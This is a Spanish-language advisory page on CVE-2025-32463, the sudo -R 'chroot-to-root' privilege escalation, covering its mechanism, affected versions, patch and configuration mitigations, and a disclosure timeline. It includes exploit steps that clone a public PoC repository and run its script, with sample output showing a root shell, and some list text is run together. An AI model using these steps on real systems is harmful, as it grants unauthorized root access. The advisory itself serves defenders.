
CVE-2025-32463

Escalación de Privilegios Local Crítica en el Administrador de Privilegios de Linux Más Utilizado
Cualquier usuario local (incluso sin permisos en sudoers) podría convertirse en root en segundos usando sudo -R
CVE-2025-32463 (también conocida como "chroot-to-root") es una vulnerabilidad crítica de escalación de privilegios local en sudo.
Permite a cualquier usuario local sin privilegios — incluso aquellos no listados en sudoers — obtener acceso root completo simplemente usando la opción -R / --chroot.
La falla fue introducida en sudo 1.9.14 (junio de 2023) y existió hasta 1.9.17p1 (junio de 2025). No era un error tradicional sino un peligroso efecto secundario de cómo sudo manejaba la resolución de rutas dentro de un chroot controlado por el usuario antes de las verificaciones de políticas.
Aviso oficial de sudo: "Un atacante puede aprovechar la opción
-Rde sudo para ejecutar comandos arbitrarios como root, incluso si no están listados en el archivo sudoers."
Verificación de Realidad:
El error se originó por un cambio de 2023 en la lógica de coincidencia de comandos de sudo:
-R /ruta, sudo llama a pivot_root() antes de evaluar completamente la política de sudoers./etc/nsswitch.conf desde dentro del chroot./etc/nsswitch.conf malicioso (por ejemplo, passwd: /woot1337)libnss_/woot1337.so.2 que contiene un constructor que se ejecuta como root.Conclusión Clave: La opción -R se permitía incluso para usuarios sin permisos en sudo, lo que la convierte en un vector de ataque perfecto.
Solo sudo 1.9.14 hasta 1.9.17 (antes de 1.9.17p1)
Ampliamente Afectados:
NO afectados:
Exploit de una línea (de Stratascale CRU):
# 1 – clone repo
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠ WARNING: CVE-2025-32463 EXPLOIT PoC ⚠
═══════════════════════════════════════════════════════════════
This script is for AUTHORIZED TESTING ONLY on systems you own.
Running on unauthorized systems is ILLEGAL.
Patch immediately after testing (sudo 1.9.17p1+).
[+] Creating temporary exploit stage...
[+] Compiling malicious NSS library...
[+] Triggering sudo -R ... (expect root shell)
(If successful, you'll drop into a root bash prompt)
[!] CVE-2025-32463 triggered - gaining root...
[+] You are now root!
┌──(root㉿kali)-[/]
└─# whoami
root
sudo -V | head -n 1
✅ Seguro si es 1.9.17p1 o más reciente (o ≤ 1.9.13)
Debian/Ubuntu:
sudo apt update && sudo apt install --reinstall sudo
Fedora/RHEL:
sudo dnf update sudo
Arch:
sudo pacman -S sudo
Añadir a /etc/sudoers (o un archivo en /etc/sudoers.d/):
Defaults !use_chroot
Buscar y eliminar cualquier línea CHROOT= o runchroot=.
Consejo Pro 2026: Escanea imágenes Docker antiguas, runners de CI y máquinas virtuales heredadas — muchas aún contienen instantáneas vulnerables de sudo.
--chroot) pueden convertirse en superficie de ataque si no se aíslan.Este incidente reforzó la necesidad del principio de mínimo privilegio incluso en herramientas centrales del sistema.
Estado a marzo de 2026: ✅ Completamente mitigado en todos los sistemas modernos • Funcionalidad chroot obsoleta • Ecosistema más seguro
Hecho con ❤️ para los administradores de Linux que parchearon antes del golpe del KEV
| Fecha | Evento |
|---|
| Junio 2023 | Publicación de sudo 1.9.14 (error introducido) |
| 1 de abril de 2025 | Rich Mirch reporta de forma privada |
| 8 de abril de 2025 | Se asigna CVE-2025-32463 |
| 9 de junio de 2025 | Se propone parche |
| 30 de junio de 2025 | Divulgación pública + blog de Stratascale + PoC completo |
| Julio 2025 | Publicación de sudo 1.9.17p1; principales distribuciones lanzan actualizaciones |
| 29 de septiembre de 2025 | Añadido al catálogo CISA KEV |
| 2026 | Funcionalidad chroot completamente obsoleta en todo el ecosistema |